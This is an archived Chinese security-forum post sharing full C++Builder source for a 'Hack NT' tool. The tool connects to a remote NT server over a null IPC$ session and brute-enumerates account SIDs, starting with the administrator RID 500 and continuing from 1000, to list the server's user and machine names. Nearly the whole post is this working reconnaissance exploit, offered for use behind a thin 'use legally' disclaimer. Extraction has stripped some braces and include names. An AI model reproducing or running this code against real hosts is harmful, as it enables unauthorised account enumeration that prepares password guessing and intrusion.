精华区 [关闭][返回]
当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◇网络安全◇>>NTSERVER安全>>获取远程NT Server用户列表 (原码)

主题:获取远程NT Server用户列表 (原码)
发信人: williamlong(蓝色月光)
整理人: williamlong(2002-05-22 10:14:36), 站内信件
获取远程NT Server用户列表 (原码)
(421 个字于此篇帖子)
(已阅读: 7 次)     



获取远程NT Server用户列表 

作者: 病毒 发表于 绿色兵团 

此程序是当时得知有此漏洞后,找到相关资料现写的 
虽然实现了功能但还很不完善。时间长了也就懒的改了, 
为了让大家深入了解,特此给出完整程序 

//--------------------------------------------------------------------------- 

#include 
#include 
#pragma hdrstop 

#include "NtSafe.h" 
//--------------------------------------------------------------------------- 
#pragma package(smart_init) 
#pragma resource "*.dfm" 
TForm1 *Form1; 



//--------------------------------------------------------------------------- 
__fastcall TForm1::TForm1(TComponent* Owner) 
: TForm(Owner) 


//--------------------------------------------------------------------------- 
void __fastcall TForm1::Button3Click(TObject *Sender) 

Application->MessageBox("Hack NT 说明:\n\n\n可利用本程序获取,远程NT服务器\n\n 
\n上所有用户及计算机,请合法使用\n\n\n滥用者一切后果自负,与本人无关\n\n\n\n作者:贾 
佳\n\ne-mail:[email protected]","本程序只能在NT上使用",MB_OK); 

//--------------------------------------------------------------------------- 




void __fastcall TForm1::FormShow(TObject *Sender) 

OSVERSIONINFO osi; 

osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); 
//判断操作系统是否为NT 
if(GetVersionEx(&osi)) 

if(osi.dwPlatformId!=VER_PLATFORM_WIN32_NT) 

Button1->Enabled=false; 
Application->MessageBox("你的操作系统不是NT,此程序无法正常运行","请在NT 
主机上运行",MB_OK|MB_ICONWARNING); 

else 
Button1->Enabled=true; 


//--------------------------------------------------------------------------- 

void __fastcall TForm1::Button1Click(TObject *Sender) 


SID_NAME_USE peUse; 
PSID_IDENTIFIER_AUTHORITY SidIdentify; 
NETRESOURCE netr; 

TCHAR netBuf[MAX_PATH]; 
TCHAR netNB[MAX_PATH]; 
DWORD dwResult; 
PSID Sid; 
PSID newSid; 
DWORD cbSid; 
TCHAR DomainName[MAX_PATH]; 
DWORD cbDomainName; 
TCHAR AccountBuff[MAX_PATH]; 
DWORD cbAccountBuff; 
BYTE SidSubCount; 
BYTE StoreCount; 
int i,j; 
DWORD storeSIDsub[8]; 
DWORD tempPDWORD; 

Form1->Button1->Enabled=false; 
ListBox1->Items->Clear(); 
cbDomainName=255; 
cbSid=255; 
sprintf(netBuf,"\\\\%s\\ipc$",Form1->Edit1->Text.c_str()); 
sprintf(netNB,"\\\\%s",Form1->Edit1->Text.c_str()); 
netr.dwScope=RESOURCE_GLOBALNET; 
netr.dwType=RESOURCETYPE_ANY; 
netr.lpLocalName=""; 
netr.lpRemoteName=netBuf; 
netr.lpProvider=NULL; 

//首先用WNetAddConnection2以空(IPC$)方式连接服务器 

dwResult=WNetAddConnection2(&netr,"","",NULL); 
if(dwResult==NO_ERROR) 


//然后以LookupAccountName用一个系统和帐户名称作为输入,得到域名 

if(LookupAccountName(netNB,"Guest",Sid,&cbSid,DomainName,&cbDomainName,&peU 
se)) 

sprintf(netBuf,"域名: %s",DomainName); 
Form1->ListBox1->Items->Add(String(netBuf)); 

//接着用GetSidIdentifierAuthority返回一个指定的安全标识符结构 

SidIdentify=GetSidIdentifierAuthority(Sid); 

//再用GetSidSubAuthorityCount返回指定安全标识符结构中指定的子权限的地址 

SidSubCount=*GetSidSubAuthorityCount(Sid); 
StoreCount=SidSubCount; 

for(i=0;i<=StoreCount-1;i++)
{
//接着用GetSidSubAuthority函数返回数组地

tempPDWORD=*GetSidSubAuthority(Sid,i);
storeSIDsub[i]=tempPDWORD;
}
cbDomainName=255;
cbAccountBuff=255;
storeSIDsub[StoreCount-1]=500;

//再用AllocateAndInitializeSid将八个子权限分配初始化这个安全标识符

if(AllocateAndInitializeSid(SidIdentify,SidSubCount,storeSIDsub[0],stor
eSIDsub[1],
storeSIDsub[2],storeSIDsub[3],storeSIDsub[4
],storeSIDsub[5],
storeSIDsub[6],storeSIDsub[7],&newSid))
{

//最后用LookupAccountSid接受一个安全标识符作为输入即可得到用户名。

if(LookupAccountSid(netNB,newSid,AccountBuff,&cbAccountBuff,DomainNa
me,&cbDomainName,&peUse))
{
Form1->ListBox1->Items->Add("用户名称: "+String(AccountBuff)); 


else 
exit(1); 
FreeSid(newSid); 

//以下枚举过程 
j=1; 
i=1000; 
while(j<=30)
{
cbDomainName=255;
cbAccountBuff=255;
storeSIDsub[StoreCount-1]=i;
//初始化,同上
AllocateAndInitializeSid(SidIdentify,SidSubCount,storeSIDsub[0],st
oreSIDsub[1],
storeSIDsub[2],storeSIDsub[3],storeSIDsub[4
],storeSIDsub[5],
storeSIDsub[6],storeSIDsub[7],&newSid);

//获取用户名,同上
if(LookupAccountSid(netNB,newSid,AccountBuff,&cbAccountBuff,Domain
Name,&cbDomainName,&peUse))
{
if(peUse==SidTypeInvalid) j=j+1;
else if(peUse!=SidTypeDeletedAccount)
{
j=-1;
int le=lstrlen(AccountBuff);
if(AccountBuff[le-1]=='$')
Form1->ListBox1->Items->Add("主机名称: "+String(AccountB 
uff)); 
else 
Form1->ListBox1->Items->Add("用户名称: "+String(AccountB 
uff)); 


else 
j=j+1; 
Application->ProcessMessages(); 
i=i+1; 
FreeSid(newSid); 



else Application->MessageBox("请重新连接","无法获得SID标识",MB_OK|MB_ICONW 
ARNING); 

else 
Application->MessageBox("请先确认IP地址是否正确,是否为NT主机且绑定了NETBIO 
S服务","无法连接主机",MB_OK|MB_ICONWARNING); 
WNetCancelConnection2(netBuf,0,true); 
Form1->Button1->Enabled=true; 


//--------------------------------------------------------------------------- 


 
[ 回到 技术文摘 | 精华区索引 ]  
 
   
   


Copyright @ 1997-2001 绿色兵团



[关闭][返回]